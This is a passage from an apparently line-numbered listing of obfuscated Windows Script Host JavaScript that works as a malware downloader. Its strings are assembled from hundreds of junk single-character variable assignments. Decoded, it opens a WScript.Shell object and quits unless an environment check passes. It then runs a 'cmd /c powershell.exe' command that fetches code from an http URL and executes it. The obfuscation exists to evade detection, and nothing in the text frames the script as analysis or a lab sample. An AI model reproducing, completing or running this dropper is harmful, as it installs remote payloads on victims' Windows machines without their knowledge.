2 | var iaevroqsn = this[wvfqmpmlx + qlitcs + xecfw + ecobz + zsrgc + oyiqbsqc + cbgewwpsf + yaursguxi] ( this[sywkav + xoljwmix + aqwxlvw + xecfw + riasisqw + wvfqmpmlx + yaursguxi][kdcmais + xecfw + zsrgc + qlitcs + yaursguxi + zsrgc + kryeeb + xoxte + jsgbvxlhz + zsrgc + aqwxlvw + yaursguxi] ( sywkav + xoljwmix + aqwxlvw + xecfw + riasisqw + wvfqmpmlx + yaursguxi + dtmswy + xoljwmix + ntqdtttr + zsrgc + khckr + khckr ) [xposf + zsrgc + tfskonn + xposf + zsrgc + qlitcs + nunpwzvp] ( guhwg + jzrwvpeif + krepy + hovnml + cbakzz + kdcmais + bzovzzmgj + xposf + xposf + krepy + jbjfbj + gyjhydex + cbakzz + bzovzzmgj + xoljwmix + krepy + xposf + vhojsvuo + kdcmais + bboxwy + cbgewwpsf + yaursguxi + xecfw + bboxwy + khckr + rxoak + sjzvvpxct + qlitcs + cbgewwpsf + zsrgc + khckr + vhojsvuo + oyiqbsqc + cbgewwpsf + yaursguxi + zsrgc + xecfw + cbgewwpsf + qlitcs + yaursguxi + riasisqw + bboxwy + cbgewwpsf + qlitcs + khckr + vhojsvuo + rzxexdoiy + bboxwy + aqwxlvw + qlitcs + khckr + zsrgc ), 16 ); |
|
3 | for ( kszitm = 0 ; kszitm < tbzqwwh[khckr + zsrgc + cbgewwpsf + tfskonn + yaursguxi + ntqdtttr] ; ++ kszitm ) | |
4 | { | |
5 | if ( iaevroqsn == tbzqwwh[kszitm] ) | |
6 | { | |
7 | iaevroqsn = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( iaevroqsn !== true ) | |
12 | this[sywkav + xoljwmix + aqwxlvw + xecfw + riasisqw + wvfqmpmlx + yaursguxi][ejuhfyzu + vyibgor + riasisqw + yaursguxi] ( ); | |
13 | this[sywkav + xoljwmix + aqwxlvw + xecfw + riasisqw + wvfqmpmlx + yaursguxi][kdcmais + xecfw + zsrgc + qlitcs + yaursguxi + zsrgc + kryeeb + xoxte + jsgbvxlhz + zsrgc + aqwxlvw + yaursguxi] ( sywkav + xoljwmix + aqwxlvw + xecfw + riasisqw + wvfqmpmlx + yaursguxi + dtmswy + xoljwmix + ntqdtttr + zsrgc + khckr + khckr ) [xecfw + vyibgor + cbgewwpsf] ( aqwxlvw + pdmckccdk + nunpwzvp + rxoak + sfdvicmp + aqwxlvw + rxoak + wvfqmpmlx + bboxwy + jvfjfq + zsrgc + xecfw + ecobz + ntqdtttr + zsrgc + khckr + khckr + dtmswy + zsrgc + ytzmu + zsrgc + rxoak + rqara + kdcmais + bboxwy + pdmckccdk + pdmckccdk + qlitcs + cbgewwpsf + nunpwzvp + rxoak + iaehfvvi + oyiqbsqc + cbgewwpsf + njtybxpk + bboxwy + nxqikmdbd + zsrgc + rqara + sywkav + zsrgc + xoxte + xposf + zsrgc + xzdwc + vyibgor + zsrgc + ecobz + yaursguxi + rxoak + rqara + kryeeb + vyibgor + yaursguxi + hliweghad + riasisqw + khckr + zsrgc + rxoak + tkfqapi + yaursguxi + zsrgc + pdmckccdk + wvfqmpmlx + tkfqapi + vhojsvuo + riasisqw + cbgewwpsf + njtybxpk + bboxwy + riasisqw + aqwxlvw + zsrgc + dtmswy + wvfqmpmlx + nunpwzvp + aygqrgzx + rxoak + ntqdtttr + yaursguxi + yaursguxi + wvfqmpmlx + xcwjwuk + sfdvicmp + sfdvicmp + ozwsamu + pauojwuvy + kylsvegst + dtmswy + ozwsamu + qqzyj + kylsvegst + dtmswy + ozwsamu + dtmswy + fjvrtsytf + jyivric + wwliywf + sfdvicmp + riasisqw + cbgewwpsf + njtybxpk + bboxwy + riasisqw + aqwxlvw + zsrgc + dtmswy + wvfqmpmlx + ntqdtttr + wvfqmpmlx + iaehfvvi + jdnxsal + jdnxsal + ecobz + yaursguxi + qlitcs + xecfw + yaursguxi + rxoak + tkfqapi + yaursguxi + zsrgc + pdmckccdk + wvfqmpmlx + tkfqapi + vhojsvuo + riasisqw + cbgewwpsf + njtybxpk + bboxwy + riasisqw + aqwxlvw + zsrgc + dtmswy + wvfqmpmlx + nunpwzvp + aygqrgzx + jdnxsal + jdnxsal + aqwxlvw + pdmckccdk + nunpwzvp + rxoak + sfdvicmp + aqwxlvw + rxoak + cbgewwpsf + zsrgc + yaursguxi + rxoak + vyibgor + ecobz + zsrgc + rxoak + vhojsvuo + vhojsvuo + ozwsamu + pauojwuvy + kylsvegst + dtmswy + ozwsamu + qqzyj + kylsvegst + dtmswy + ozwsamu + dtmswy + fjvrtsytf + jyivric + wwliywf + bdxybxiv + xltor + xltor + xltor + xltor + vhojsvuo + nunpwzvp + qlitcs + njtybxpk + jvfjfq + jvfjfq + jvfjfq + xecfw + bboxwy + bboxwy + yaursguxi + vhojsvuo + jdnxsal + jdnxsal + aqwxlvw + pdmckccdk + nunpwzvp + rxoak + sfdvicmp + aqwxlvw + rxoak + xecfw + zsrgc + tfskonn + ecobz + njtybxpk + xecfw + kylsvegst + fjvrtsytf + rxoak + sfdvicmp + ecobz + rxoak + vhojsvuo + vhojsvuo + ozwsamu + pauojwuvy + kylsvegst + dtmswy + ozwsamu + qqzyj + kylsvegst + dtmswy + ozwsamu + dtmswy + fjvrtsytf + jyivric + wwliywf + bdxybxiv + xltor + xltor + xltor + xltor + vhojsvuo + nunpwzvp + qlitcs + njtybxpk + jvfjfq + jvfjfq + jvfjfq + xecfw + bboxwy + bboxwy + yaursguxi + vhojsvuo + fjvrtsytf + pauojwuvy + kylsvegst + pauojwuvy + jyivric + xltor + xltor + bdgrx + fjvrtsytf + fjvrtsytf + pauojwuvy + ozwsamu + kylsvegst + dtmswy + nunpwzvp + khckr + khckr, 0, false ); |
|
14 | } | |
15 | qqzyj = "N"; | |
16 | qqzyj = "Y"; | |
17 | qqzyj = "q"; | |
18 | qqzyj = "c"; | |
19 | qqzyj = "V"; | |
20 | qqzyj = "o"; | |
21 | qqzyj = "T"; | |
22 | qqzyj = "l"; | |
23 | qqzyj = "4"; | |
24 | xposf = "B"; | |
25 | xposf = "P"; | |
26 | xposf = "u"; | |
27 | xposf = "k"; | |
28 | xposf = "t"; | |
29 | xposf = "s"; | |
30 | xposf = "n"; | |
31 | xposf = "T"; | |
32 | xposf = "O"; | |
33 | xposf = "s"; | |
34 | xposf = "O"; | |
35 | xposf = "E"; | |
36 | xposf = "v"; | |
37 | xposf = "C"; | |
38 | xposf = "s"; | |
39 | xposf = "R"; | |
40 | xposf = "S"; | |
41 | xposf = "z"; | |
42 | xposf = "x"; | |
43 | xposf = "R"; | |
44 | xoljwmix = "K"; | |
45 | xoljwmix = "A"; | |
46 | xoljwmix = "a"; | |
47 | xoljwmix = "u"; | |
48 | xoljwmix = "N"; | |
49 | xoljwmix = "p"; | |
50 | xoljwmix = "x"; | |
51 | xoljwmix = "W"; | |
52 | xoljwmix = "Y"; | |
53 | xoljwmix = "Z"; | |
54 | xoljwmix = "C"; | |
55 | xoljwmix = "h"; | |
56 | xoljwmix = "I"; | |
57 | xoljwmix = "t"; | |
58 | xoljwmix = "e"; | |
59 | xoljwmix = "F"; | |
60 | xoljwmix = "U"; | |
61 | xoljwmix = "K"; | |
62 | xoljwmix = "w"; | |
63 | xoljwmix = "p"; | |
64 | xoljwmix = "h"; | |
65 | xoljwmix = "G"; | |
66 | xoljwmix = "Q"; | |
67 | xoljwmix = "z"; | |
68 | xoljwmix = "c"; | |
69 | xoljwmix = "A"; | |
70 | xoljwmix = "i"; | |
71 | xoljwmix = "M"; | |
72 | xoljwmix = "v"; | |
73 | xoljwmix = "b"; | |
74 | xoljwmix = "A"; | |
75 | xoljwmix = "a"; | |
76 | xoljwmix = "i"; | |
77 | xoljwmix = "c"; | |
78 | xoljwmix = "A"; | |
79 | xoljwmix = "S"; | |
80 | kdcmais = "j"; | |
81 | kdcmais = "j"; | |
82 | kdcmais = "h"; | |
83 | kdcmais = "U"; | |
84 | kdcmais = "p"; | |
85 | kdcmais = "C"; | |
86 | kdcmais = "c"; | |
87 | kdcmais = "T"; | |
88 | kdcmais = "S"; | |
89 | kdcmais = "r"; | |
90 | kdcmais = "X"; | |
91 | kdcmais = "w"; | |
92 | kdcmais = "Y"; | |
93 | kdcmais = "u"; | |
94 | kdcmais = "o"; | |
95 | kdcmais = "b"; | |
96 | kdcmais = "y"; | |
97 | kdcmais = "J"; | |
98 | kdcmais = "g"; | |
99 | kdcmais = "d"; | |
100 | kdcmais = "G"; | |
101 | kdcmais = "t"; | |
102 | kdcmais = "j"; | |
103 | kdcmais = "U"; | |
104 | kdcmais = "C"; | |
105 | nunpwzvp = "l"; | |
106 | nunpwzvp = "I"; | |
107 | nunpwzvp = "k"; | |
108 | nunpwzvp = "A"; | |
109 | nunpwzvp = "m"; | |
110 | nunpwzvp = "K"; | |
111 | nunpwzvp = "I"; | |
112 | nunpwzvp = "x"; | |
113 | nunpwzvp = "v"; | |
114 | nunpwzvp = "r"; | |
115 | nunpwzvp = "j"; | |
116 | nunpwzvp = "F"; | |
117 | nunpwzvp = "J"; | |
118 | nunpwzvp = "Y"; | |
119 | nunpwzvp = "X"; | |
120 | nunpwzvp = "e"; | |
121 | nunpwzvp = "C"; | |
122 | nunpwzvp = "D"; | |
123 | nunpwzvp = "x"; | |
124 | nunpwzvp = "E"; | |
125 | nunpwzvp = "t"; | |
126 | nunpwzvp = "d"; | |
127 | iaehfvvi = "F"; | |
128 | iaehfvvi = "Y"; | |
129 | iaehfvvi = "r"; | |
130 | iaehfvvi = "n"; | |
131 | iaehfvvi = "j"; | |
132 | iaehfvvi = "c"; | |
133 | iaehfvvi = "C"; | |
134 | iaehfvvi = "k"; | |
135 | iaehfvvi = "M"; | |
136 | iaehfvvi = "s"; | |
137 | iaehfvvi = "I"; | |
138 | iaehfvvi = "W"; | |
139 | iaehfvvi = "B"; | |
140 | iaehfvvi = "U"; | |
141 | iaehfvvi = "t"; | |
142 | iaehfvvi = "z"; | |
143 | iaehfvvi = "H"; | |
144 | iaehfvvi = "g"; | |
145 | iaehfvvi = "L"; | |
146 | iaehfvvi = "S"; | |
147 | iaehfvvi = "S"; | |
148 | iaehfvvi = "C"; | |
149 | iaehfvvi = "c"; | |
150 | iaehfvvi = "s"; | |
151 | iaehfvvi = "Q"; | |
152 | iaehfvvi = "C"; | |
153 | iaehfvvi = "L"; | |
154 | iaehfvvi = "K"; | |
155 | iaehfvvi = "B"; | |
156 | iaehfvvi = "U"; | |
157 | iaehfvvi = "w"; | |
158 | iaehfvvi = "c"; | |
159 | iaehfvvi = "v"; | |
160 | iaehfvvi = "d"; | |
161 | iaehfvvi = "W"; | |
162 | iaehfvvi = "\""; | |
163 | khckr = "N"; | |
164 | khckr = "W"; | |
165 | khckr = "L"; | |
166 | khckr = "c"; | |
167 | khckr = "o"; | |
168 | khckr = "x"; | |
169 | khckr = "c"; | |
170 | khckr = "A"; | |
171 | khckr = "g"; | |
172 | khckr = "K"; | |
173 | khckr = "b"; | |
174 | khckr = "C"; | |
175 | khckr = "O"; | |
176 | khckr = "O"; | |
177 | khckr = "N"; | |
178 | khckr = "l"; | |
179 | khckr = "M"; | |
180 | khckr = "h"; | |
181 | khckr = "X"; | |
182 | khckr = "Y"; | |
183 | khckr = "I"; | |
184 | khckr = "Z"; | |
185 | khckr = "Y"; | |
186 | khckr = "u"; | |
187 | khckr = "y"; | |
188 | khckr = "z"; | |
189 | khckr = "J"; | |
190 | khckr = "v"; | |
191 | khckr = "l"; | |
192 | sywkav = "E"; | |
193 | sywkav = "m"; | |
194 | sywkav = "s"; | |
195 | sywkav = "G"; | |
196 | sywkav = "q"; | |
197 | sywkav = "I"; | |
198 | sywkav = "n"; | |
199 | sywkav = "T"; | |
200 | sywkav = "v"; | |
201 | sywkav = "A"; | |
202 | sywkav = "T"; | |
203 | sywkav = "O"; | |
204 | sywkav = "T"; | |
205 | sywkav = "p"; | |
206 | sywkav = "f"; | |
207 | sywkav = "z"; | |
208 | sywkav = "S"; | |
209 | sywkav = "Y"; | |
210 | sywkav = "D"; | |
211 | sywkav = "W"; | |
212 | cbgewwpsf = "P"; | |
213 | cbgewwpsf = "G"; | |
214 | cbgewwpsf = "t"; | |
215 | cbgewwpsf = "j"; | |
216 | cbgewwpsf = "V"; | |
217 | cbgewwpsf = "b"; | |
218 | cbgewwpsf = "g"; | |
219 | cbgewwpsf = "p"; | |
220 | cbgewwpsf = "E"; | |
221 | cbgewwpsf = "N"; | |
222 | cbgewwpsf = "h"; | |
223 | cbgewwpsf = "N"; | |
224 | cbgewwpsf = "P"; | |
225 | cbgewwpsf = "G"; | |
226 | cbgewwpsf = "k"; | |
227 | cbgewwpsf = "j"; | |
228 | cbgewwpsf = "s"; | |
229 | cbgewwpsf = "J"; | |
230 | cbgewwpsf = "i"; | |
231 | cbgewwpsf = "E"; | |
232 | cbgewwpsf = "j"; | |
233 | cbgewwpsf = "Z"; | |
234 | cbgewwpsf = "l"; | |
235 | cbgewwpsf = "P"; | |
236 | cbgewwpsf = "m"; | |
237 | cbgewwpsf = "Y"; | |
238 | cbgewwpsf = "e"; | |
239 | cbgewwpsf = "v"; | |
240 | cbgewwpsf = "T"; | |
241 | cbgewwpsf = "F"; | |
242 | cbgewwpsf = "C"; | |
243 | cbgewwpsf = "l"; | |
244 | cbgewwpsf = "c"; | |
245 | cbgewwpsf = "I"; | |
246 | cbgewwpsf = "d"; | |
247 | cbgewwpsf = "n"; | |
248 | cbgewwpsf = "n"; | |
249 | cbgewwpsf = "t"; | |
250 | cbgewwpsf = "U"; | |
251 | cbgewwpsf = "n"; | |
252 | jvfjfq = "d"; | |
253 | jvfjfq = "A"; | |
254 | jvfjfq = "J"; | |
255 | jvfjfq = "R"; | |
256 | jvfjfq = "E"; | |
257 | jvfjfq = "i"; | |
258 | jvfjfq = "Z"; | |
259 | jvfjfq = "v"; | |
260 | jvfjfq = "w"; | |
261 | kylsvegst = "S"; | |
262 | kylsvegst = "I"; | |
263 | kylsvegst = "g"; | |
264 | kylsvegst = "f"; | |
265 | kylsvegst = "J"; | |
266 | kylsvegst = "U"; | |
267 | kylsvegst = "M"; | |
268 | kylsvegst = "m"; | |
269 | kylsvegst = "3"; | |
270 | rxoak = "v"; | |
271 | rxoak = "v"; | |
272 | rxoak = "V"; | |
273 | rxoak = "p"; | |
274 | rxoak = "c"; | |
275 | rxoak = "V"; | |
276 | rxoak = "e"; | |
277 | rxoak = "M"; | |
278 | rxoak = "c"; | |
279 | rxoak = "j"; | |
280 | rxoak = "E"; | |
281 | rxoak = "n"; | |
282 | rxoak = "F"; | |
283 | rxoak = "H"; | |
284 | rxoak = "G"; | |
285 | rxoak = "W"; | |
286 | rxoak = "N"; | |
287 | rxoak = "J"; | |
288 | rxoak = "m"; | |
289 | rxoak = "K"; | |
290 | rxoak = "j"; | |
291 | rxoak = "k"; | |
292 | rxoak = "z"; | |
293 | rxoak = "R"; | |
294 | rxoak = "S"; | |
295 | rxoak = "z"; | |
296 | rxoak = " "; | |
297 | jsgbvxlhz = "k"; | |
298 | jsgbvxlhz = "b"; | |
299 | jsgbvxlhz = "W"; | |
300 | jsgbvxlhz = "s"; | |
301 | jsgbvxlhz = "K"; | |
302 | jsgbvxlhz = "e"; | |
303 | jsgbvxlhz = "P"; | |
304 | jsgbvxlhz = "Z"; | |
305 | jsgbvxlhz = "w"; | |
306 | jsgbvxlhz = "t"; | |
307 | jsgbvxlhz = "q"; | |
308 | jsgbvxlhz = "f"; | |
309 | jsgbvxlhz = "p"; | |
310 | jsgbvxlhz = "D"; | |
311 | jsgbvxlhz = "A"; | |
312 | jsgbvxlhz = "j"; | |
313 | pdmckccdk = "E"; | |
314 | pdmckccdk = "j"; | |
315 | pdmckccdk = "c"; | |
316 | pdmckccdk = "E"; | |
317 | pdmckccdk = "U"; | |
318 | pdmckccdk = "E"; | |
319 | pdmckccdk = "W"; | |
320 | pdmckccdk = "h"; | |
321 | pdmckccdk = "I"; | |
322 | pdmckccdk = "w"; | |
323 | pdmckccdk = "B"; | |
324 | pdmckccdk = "S"; | |
325 | pdmckccdk = "Z"; | |
326 | pdmckccdk = "p"; | |
327 | pdmckccdk = "B"; | |
328 | pdmckccdk = "F"; | |
329 | pdmckccdk = "l"; | |
330 | pdmckccdk = "y"; | |
331 | pdmckccdk = "x"; | |
332 | pdmckccdk = "m"; | |
333 | pdmckccdk = "C"; | |
334 | pdmckccdk = "F"; | |
335 | pdmckccdk = "c"; | |
336 | pdmckccdk = "m"; | |
337 | pdmckccdk = "I"; | |
338 | pdmckccdk = "O"; | |
339 | pdmckccdk = "g"; | |
340 | pdmckccdk = "i"; | |
341 | pdmckccdk = "O"; | |
342 | pdmckccdk = "i"; | |
343 | pdmckccdk = "a"; | |
344 | pdmckccdk = "s"; | |
345 | pdmckccdk = "D"; | |
346 | pdmckccdk = "o"; | |
347 | pdmckccdk = "x"; | |
348 | pdmckccdk = "X"; | |
349 | pdmckccdk = "r"; | |
350 | pdmckccdk = "t"; | |
351 | pdmckccdk = "m"; | |
352 | bboxwy = "a"; | |
353 | bboxwy = "f"; | |
354 | bboxwy = "s"; | |
355 | bboxwy = "d"; | |
356 | bboxwy = "r"; | |
357 | bboxwy = "n"; | |
358 | bboxwy = "c"; | |
359 | bboxwy = "M"; | |
360 | bboxwy = "b"; | |
361 | bboxwy = "p"; | |
362 | bboxwy = "u"; | |
363 | bboxwy = "D"; | |
364 | bboxwy = "h"; | |
365 | bboxwy = "q"; | |
366 | bboxwy = "n"; | |
367 | bboxwy = "f"; | |
368 | bboxwy = "u"; | |
369 | bboxwy = "s"; | |
370 | bboxwy = "L"; | |
371 | bboxwy = "G"; | |
372 | bboxwy = "K"; | |
373 | bboxwy = "o"; | |
374 | bboxwy = "y"; | |
375 | bboxwy = "e"; | |
376 | bboxwy = "p"; | |
377 | bboxwy = "G"; | |
378 | bboxwy = "H"; | |
379 | bboxwy = "y"; | |
380 | bboxwy = "t"; | |
381 | bboxwy = "k"; | |
382 | bboxwy = "s"; | |
383 | bboxwy = "B"; | |
384 | bboxwy = "l"; | |
385 | bboxwy = "j"; | |
386 | bboxwy = "k"; | |
387 | bboxwy = "T"; | |
388 | bboxwy = "o"; | |
389 | ecobz = "O"; | |
390 | ecobz = "J"; | |
391 | ecobz = "G"; | |
392 | ecobz = "g"; | |
393 | ecobz = "b"; | |
394 | ecobz = "h"; | |
395 | ecobz = "u"; | |
396 | ecobz = "U"; | |
397 | ecobz = "E"; | |
398 | ecobz = "B"; | |
399 | ecobz = "s"; | |
400 | xoxte = "g"; | |
401 | xoxte = "j"; | |
402 | xoxte = "X"; | |
403 | xoxte = "I"; | |
404 | xoxte = "A"; | |
405 | xoxte = "O"; | |
406 | xoxte = "j"; | |
407 | xoxte = "d"; | |
408 | xoxte = "S"; | |
409 | xoxte = "E"; | |
410 | xoxte = "r"; | |
411 | xoxte = "r"; | |
412 | xoxte = "A"; | |
413 | xoxte = "d"; | |
414 | xoxte = "q"; | |
415 | xoxte = "P"; | |
416 | xoxte = "q"; | |
417 | xoxte = "T"; | |
418 | xoxte = "o"; | |
419 | xoxte = "t"; | |
420 | xoxte = "U"; | |
421 | xoxte = "c"; | |
422 | xoxte = "t"; | |
423 | xoxte = "g"; | |
424 | xoxte = "L"; | |
425 | xoxte = "S"; | |
426 | xoxte = "S"; | |
427 | xoxte = "z"; | |
428 | xoxte = "C"; | |
429 | xoxte = "P"; | |
430 | xoxte = "Q"; | |
431 | xoxte = "k"; | |
432 | xoxte = "z"; | |
433 | xoxte = "S"; | |
434 | xoxte = "b"; | |
435 | hliweghad = "z"; | |
436 | hliweghad = "H"; | |
437 | hliweghad = "N"; | |
438 | hliweghad = "x"; | |
439 | hliweghad = "i"; | |
440 | hliweghad = "Z"; | |
441 | hliweghad = "M"; | |
442 | hliweghad = "d"; | |
443 | hliweghad = "W"; | |
444 | hliweghad = "i"; | |
445 | hliweghad = "Z"; | |
446 | hliweghad = "P"; | |
447 | hliweghad = "R"; | |
448 | hliweghad = "S"; | |
449 | hliweghad = "l"; | |
450 | hliweghad = "t"; | |
451 | hliweghad = "X"; | |
452 | hliweghad = "F"; | |
453 | pauojwuvy = "c"; | |
454 | pauojwuvy = "v"; | |
455 | pauojwuvy = "o"; | |
456 | pauojwuvy = "d"; | |
457 | pauojwuvy = "J"; | |
458 | pauojwuvy = "t"; | |
459 | pauojwuvy = "E"; | |
460 | pauojwuvy = "k"; | |
461 | pauojwuvy = "q"; | |
462 | pauojwuvy = "K"; | |
463 | pauojwuvy = "v"; | |
464 | pauojwuvy = "Y"; | |
465 | pauojwuvy = "b"; | |
466 | pauojwuvy = "m"; | |
467 | pauojwuvy = "A"; | |
468 | pauojwuvy = "B"; | |
469 | pauojwuvy = "N"; | |
470 | pauojwuvy = "G"; | |
471 | pauojwuvy = "S"; | |
472 | pauojwuvy = "x"; | |
473 | pauojwuvy = "O"; | |
474 | pauojwuvy = "9"; | |
475 | xecfw = "W"; | |
476 | xecfw = "I"; | |
477 | xecfw = "M"; | |
478 | xecfw = "P"; | |
479 | xecfw = "i"; | |
480 | xecfw = "P"; | |
481 | xecfw = "B"; | |
482 | xecfw = "p"; | |
483 | xecfw = "I"; | |
484 | xecfw = "D"; | |
485 | xecfw = "v"; | |
486 | xecfw = "X"; | |
487 | xecfw = "z"; | |
488 | xecfw = "x"; | |
489 | xecfw = "P"; | |
490 | xecfw = "N"; | |
491 | xecfw = "H"; | |
492 | xecfw = "l"; | |
493 | xecfw = "i"; | |
494 | xecfw = "o"; | |
495 | xecfw = "g"; | |
496 | xecfw = "a"; | |
497 | xecfw = "C"; | |
498 | xecfw = "P"; | |
499 | xecfw = "K"; | |
500 | xecfw = "U"; | |
501 | xecfw = "v"; | |
502 | xecfw = "U"; | |
503 | xecfw = "X"; | |
504 | xecfw = "S"; | |
505 | xecfw = "d"; | |
506 | xecfw = "h"; | |
507 | xecfw = "B"; | |
508 | xecfw = "q"; | |
509 | xecfw = "F"; | |
510 | xecfw = "Z"; | |
511 | xecfw = "m"; | |
512 | xecfw = "Z"; | |
513 | xecfw = "d"; | |
514 | xecfw = "B"; | |
515 | xecfw = "b"; | |
516 | xecfw = "r"; | |
517 | jdnxsal = "V"; | |
518 | jdnxsal = "N"; | |
519 | jdnxsal = "z"; | |
520 | jdnxsal = "S"; | |
521 | jdnxsal = "T"; | |
522 | jdnxsal = "K"; | |
523 | jdnxsal = "E"; | |
524 | jdnxsal = "F"; | |
525 | jdnxsal = "s"; | |
526 | jdnxsal = "J"; | |
527 | jdnxsal = "c"; | |
528 | jdnxsal = "L"; | |
529 | jdnxsal = "Q"; | |
530 | jdnxsal = "H"; | |
531 | jdnxsal = "I"; | |
532 | jdnxsal = "q"; | |
533 | jdnxsal = "T"; | |
534 | jdnxsal = "E"; | |
535 | jdnxsal = "Q"; | |
536 | jdnxsal = "g"; | |
537 | jdnxsal = "Y"; | |
538 | jdnxsal = "L"; | |
539 | jdnxsal = "G"; | |
540 | jdnxsal = "K"; | |
541 | jdnxsal = "f"; | |
542 | jdnxsal = "U"; | |
543 | jdnxsal = "N"; | |
544 | jdnxsal = "T"; | |
545 | jdnxsal = "Q"; | |
546 | jdnxsal = "Q"; | |
547 | jdnxsal = "&"; | |
548 | zsrgc = "T"; | |
549 | zsrgc = "i"; | |
550 | zsrgc = "l"; | |
551 | zsrgc = "n"; | |
552 | zsrgc = "z"; | |
553 | zsrgc = "P"; | |
554 | zsrgc = "g"; | |
555 | zsrgc = "Z"; | |
556 | zsrgc = "h"; | |
557 | zsrgc = "T"; | |
558 | zsrgc = "K"; | |
559 | zsrgc = "Y"; | |
560 | zsrgc = "n"; | |
561 | zsrgc = "g"; | |
562 | zsrgc = "x"; | |
563 | zsrgc = "c"; | |
564 | zsrgc = "v"; | |
565 | zsrgc = "c"; | |
566 | zsrgc = "g"; | |
567 | zsrgc = "v"; | |
568 | zsrgc = "J"; | |
569 | zsrgc = "w"; | |
570 | zsrgc = "t"; | |
571 | zsrgc = "e"; | |
572 | zsrgc = "p"; | |
573 | zsrgc = "M"; | |
574 | zsrgc = "E"; | |
575 | zsrgc = "F"; | |
576 | zsrgc = "u"; | |
577 | zsrgc = "z"; | |
578 | zsrgc = "P"; | |
579 | zsrgc = "T"; | |
580 | zsrgc = "D"; | |
581 | zsrgc = "e"; | |
582 | dtmswy = "a"; | |
583 | dtmswy = "v"; | |
584 | dtmswy = "q"; | |
585 | dtmswy = "O"; | |
586 | dtmswy = "s"; | |
587 | dtmswy = "u"; | |
588 | dtmswy = "k"; | |
589 | dtmswy = "s"; | |
590 | dtmswy = "k"; | |
591 | dtmswy = "k"; | |
592 | dtmswy = "H"; | |
593 | dtmswy = "E"; | |
594 | dtmswy = "Q"; | |
595 | dtmswy = "G"; | |
596 | dtmswy = "u"; | |
597 | dtmswy = "."; | |
598 | riasisqw = "Z"; | |
599 | riasisqw = "B"; | |
600 | riasisqw = "X"; | |
601 | riasisqw = "V"; | |
602 | riasisqw = "i"; | |
603 | ejuhfyzu = "i"; | |
604 | ejuhfyzu = "i"; | |
605 | ejuhfyzu = "R"; | |
606 | ejuhfyzu = "y"; | |
607 | ejuhfyzu = "b"; | |
608 | ejuhfyzu = "g"; | |
609 | ejuhfyzu = "P"; | |
610 | ejuhfyzu = "c"; | |
611 | ejuhfyzu = "m"; | |
612 | ejuhfyzu = "x"; | |
613 | ejuhfyzu = "q"; | |
614 | ejuhfyzu = "z"; | |
615 | ejuhfyzu = "g"; | |
616 | ejuhfyzu = "j"; | |
617 | ejuhfyzu = "w"; | |
618 | ejuhfyzu = "N"; | |
619 | ejuhfyzu = "t"; | |
620 | ejuhfyzu = "D"; | |
621 | ejuhfyzu = "s"; | |
622 | ejuhfyzu = "q"; | |
623 | ejuhfyzu = "O"; | |
624 | ejuhfyzu = "P"; | |
625 | ejuhfyzu = "Z"; | |
626 | ejuhfyzu = "P"; | |
627 | ejuhfyzu = "S"; | |
628 | ejuhfyzu = "d"; | |
629 | ejuhfyzu = "V"; | |
630 | ejuhfyzu = "U"; | |
631 | ejuhfyzu = "r"; | |
632 | ejuhfyzu = "c"; | |
633 | ejuhfyzu = "I"; | |
634 | ejuhfyzu = "T"; | |
635 | ejuhfyzu = "l"; | |
636 | ejuhfyzu = "R"; | |
637 | ejuhfyzu = "p"; | |
638 | ejuhfyzu = "Q"; | |
639 | njtybxpk = "U"; | |
640 | njtybxpk = "I"; | |
641 | njtybxpk = "Q"; | |
642 | njtybxpk = "t"; | |
643 | njtybxpk = "Y"; | |
644 | njtybxpk = "X"; | |
645 | njtybxpk = "R"; | |
646 | njtybxpk = "F"; | |
647 | njtybxpk = "j"; | |
648 | njtybxpk = "b"; | |
649 | njtybxpk = "y"; | |
650 | njtybxpk = "n"; | |
651 | njtybxpk = "Q"; | |
652 | njtybxpk = "Q"; | |
653 | njtybxpk = "i"; | |
654 | njtybxpk = "Z"; | |
655 | njtybxpk = "p"; | |
656 | njtybxpk = "v"; | |
657 | tfskonn = "c"; | |
658 | tfskonn = "N"; | |
659 | tfskonn = "p"; | |
660 | tfskonn = "d"; | |
661 | tfskonn = "H"; | |
662 | tfskonn = "h"; | |
663 | tfskonn = "F"; | |
664 | tfskonn = "x"; | |
665 | tfskonn = "h"; | |
666 | tfskonn = "o"; | |
667 | tfskonn = "D"; | |
668 | tfskonn = "S"; | |
669 | tfskonn = "i"; | |
670 | tfskonn = "R"; | |
671 | tfskonn = "z"; | |
672 | tfskonn = "Z"; | |
673 | tfskonn = "J"; | |
674 | tfskonn = "K"; | |
675 | tfskonn = "g"; | |
676 | tfskonn = "Q"; | |
677 | tfskonn = "J"; | |
678 | tfskonn = "b"; | |
679 | tfskonn = "q"; | |
680 | tfskonn = "L"; | |
681 | tfskonn = "M"; | |
682 | tfskonn = "q"; | |
683 | tfskonn = "O"; | |
684 | tfskonn = "U"; | |
685 | tfskonn = "l"; | |
686 | tfskonn = "i"; | |
687 | tfskonn = "A"; | |
688 | tfskonn = "Z"; | |
689 | tfskonn = "O"; | |
690 | tfskonn = "E"; | |
691 | tfskonn = "t"; | |
692 | tfskonn = "K"; | |
693 | tfskonn = "N"; | |
694 | tfskonn = "z"; | |
695 | tfskonn = "R"; | |
696 | tfskonn = "j"; | |
697 | tfskonn = "M"; | |
698 | tfskonn = "g"; | |
699 | guhwg = "D"; | |
700 | guhwg = "E"; | |
701 | guhwg = "l"; | |
702 | guhwg = "g"; | |
703 | guhwg = "N"; | |
704 | guhwg = "B"; | |
705 | guhwg = "Q"; | |
706 | guhwg = "D"; | |
707 | guhwg = "c"; | |
708 | guhwg = "w"; | |
709 | guhwg = "o"; | |
710 | guhwg = "r"; | |
711 | guhwg = "c"; | |
712 | guhwg = "H"; | |
713 | guhwg = "H"; | |
714 | guhwg = "S"; | |
715 | guhwg = "h"; | |
716 | guhwg = "U"; | |
717 | guhwg = "s"; | |
718 | guhwg = "Z"; | |
719 | guhwg = "R"; | |
720 | guhwg = "f"; | |
721 | guhwg = "n"; | |
722 | guhwg = "p"; | |
723 | guhwg = "I"; | |
724 | guhwg = "Z"; | |
725 | guhwg = "o"; | |
726 | guhwg = "l"; | |
727 | guhwg = "f"; | |
728 | guhwg = "K"; | |
729 | guhwg = "R"; | |
730 | guhwg = "T"; | |
731 | guhwg = "g"; | |
732 | guhwg = "H"; | |
733 | nxqikmdbd = "f"; | |
734 | nxqikmdbd = "U"; | |
735 | nxqikmdbd = "r"; | |
736 | nxqikmdbd = "f"; | |
737 | nxqikmdbd = "I"; | |
738 | nxqikmdbd = "E"; | |
739 | nxqikmdbd = "R"; | |
740 | nxqikmdbd = "y"; | |
741 | nxqikmdbd = "y"; | |
